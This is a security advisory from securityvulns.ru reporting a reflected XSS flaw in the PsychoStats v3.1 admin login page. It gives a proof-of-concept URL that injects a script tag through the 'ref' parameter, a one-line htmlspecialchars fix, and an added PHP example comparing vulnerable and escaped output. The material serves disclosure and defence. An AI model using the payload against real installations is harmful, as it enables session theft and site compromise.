[EN] securityvulns.ru

From:matrix_killer ma3x <matrix_k_(at)_abv.bg>
Date:28.12.2008
Subject:PsychoStats v3.1 XSS

PsychoStats v3.1 XSS

SOFTWARE:
=========
PsychoStats v3.1

http://www.psychostats.com/

SEVERITY:
=========
Normal

INFO:
=====
PsychoStats is open source software that creates comprehensive gaming statistics for players and clans for Half-Life and Half-Life 2 based games. This includes games like Counter-Strike, Team Fortress 2, Day of Defeat and GunGame. Other games such as Call of Duty 4 and Soldat are also supported.

ATTACK:
=======
/admin/login.php?ref="><script>alert(1771);</script>

MY FIX:
=======
Open /admin/login.php and, below the line

$cms->theme->assign_request_vars($validfields, true);

add

$ref = htmlspecialchars($ref, ENT_QUOTES);
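As an added illustration of why the fix above works (this is example code written for this page, not PsychoStats source), the following PHP contrasts the vulnerable pattern, where the raw "ref" request value lands inside a double-quoted attribute, with the hardened pattern that escapes it with htmlspecialchars() and ENT_QUOTES at the point of output. The function names and the hidden-field markup are hypothetical; the sample input is constructed from the payload shown in the advisory. One caveat the fix depends on: the escaped value must be the one the template actually renders, so if the raw value was already copied into the template context before this line, that copy is the one to escape.

```php
<?php
// Added example (not PsychoStats code). Shows the attribute-context XSS
// pattern fixed by the advisory and the htmlspecialchars(ENT_QUOTES) fix.

// Vulnerable pattern (hypothetical helper): the request value is written
// into a double-quoted attribute verbatim. A value that begins with `">`
// terminates the attribute and the tag, so the rest is parsed as markup.
function render_ref_field_vulnerable(string $ref): string
{
    return '<input type="hidden" name="ref" value="' . $ref . '">';
}

// Hardened pattern (hypothetical helper): escape for the HTML context when
// the value is output. ENT_QUOTES encodes both " and ', so the value can
// close neither kind of quoted attribute; <, > and & are encoded as well.
// Passing the charset explicitly avoids relying on the default.
function render_ref_field_safe(string $ref): string
{
    $escaped = htmlspecialchars($ref, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="ref" value="' . $escaped . '">';
}

// Quick self-check: after escaping, no raw tag delimiter or quote from the
// input survives in the rendered markup.
function is_attribute_safe(string $html, string $input): bool
{
    $escaped = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
    $expected = '<input type="hidden" name="ref" value="' . $escaped . '">';
    return $html === $expected
        && strpos($html, '<script') === false
        && substr_count($html, '"') === 6; // only the template's own quotes
}

// Constructed sample input modelled on the advisory's payload.
$sample = '"><script>alert(1771);</script>';

echo "vulnerable: ", render_ref_field_vulnerable($sample), PHP_EOL;
$safe = render_ref_field_safe($sample);
echo "hardened:   ", $safe, PHP_EOL;
echo "safe? ", is_attribute_safe($safe, $sample) ? "yes" : "no", PHP_EOL;
```

Run it with the PHP CLI to see the two renderings side by side: the vulnerable output contains a live script element, while the hardened output keeps the same markup structure and carries the payload only as inert entity text. The same escaping applies to any other request value echoed into the page, not just "ref".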


This vulnerability was discovered by matrix_killer

e-mail: matrix_k at abv.bg
